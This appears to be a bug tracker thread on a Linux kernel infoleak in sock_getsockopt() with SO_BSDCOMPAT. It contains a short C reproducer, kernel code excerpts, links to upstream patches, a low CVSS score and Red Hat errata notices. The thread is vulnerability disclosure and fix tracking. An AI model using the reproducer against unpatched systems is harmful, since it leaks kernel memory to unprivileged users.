From Clement Lecigne: In function sock_getsockopt() located in net/core/sock.c, optval v.val is not correctly initialized and directly returned in userland in case we have SO_BSDCOMPAT option set. This dummy code should trigger the bug: int main(void) { unsigned char buf[4] = { 0, 0, 0, 0 }; int len; int sock; sock = socket(33, 2, 2); getsockopt(sock, 1, SO_BSDCOMPAT, &buf, &len); printf("%x%x%x%x\n", buf[0], buf[1], buf[2], buf[3]); close(sock); } References: http://lkml.org/lkml/2009/2/11/374 http://lkml.org/lkml/2009/2/12/123 http://patchwork.kernel.org/patch/6816/
Created attachment 332522 [details] Upstream patch http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=df0bca049d01c0ee94afb7cd5dfd959541e6c8da
This is a small infoleak. Do test the return values of socket() and getsockopt() in your testcase. You should be able to see the warning "process 'reproducer' is using obsolete getsockopt SO_BSDCOMPAT" in /var/log/messages. sock = socket(2, 2, 0); err = getsockopt(sock, 1 /* SOL_SOCKET */, SO_BSDCOMPAT, &buf, &len); SYSCALL_DEFINE5(getsockopt, int, fd, int, level, int, optname, char __user *, optval, int __user *, optlen) { [...] if (level == SOL_SOCKET) err = sock_getsockopt(sock, level, optname, optval, optlen);
net: amend the fix for SO_BSDCOMPAT gsopt infoleak http://marc.info/?l=linux-kernel&m=123540732700371&w=2 http://marc.info/?l=linux-netdev&m=123543237010175&w=2
(In reply to comment #4) > net: amend the fix for SO_BSDCOMPAT gsopt infoleak > http://marc.info/?l=linux-kernel&m=123540732700371&w=2 > http://marc.info/?l=linux-netdev&m=123543237010175&w=2 http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=50fee1dec5d71b8a14c1b82f2f42e16adc227f8b
CVSS2 score of low, 2.1 (AV:L/AC:L/Au:N/C:P/I:N/A:N)
This issue has been addressed in following products: MRG for RHEL-5 Via RHSA-2009:0360 https://rhn.redhat.com/errata/RHSA-2009-0360.html
This issue has been addressed in following products: Red Hat Enterprise Linux 5 Via RHSA-2009:0326 https://rhn.redhat.com/errata/RHSA-2009-0326.html
This issue has been addressed in following products: Red Hat Enterprise Linux 4 Via RHSA-2009:0459 https://rhn.redhat.com/errata/RHSA-2009-0459.html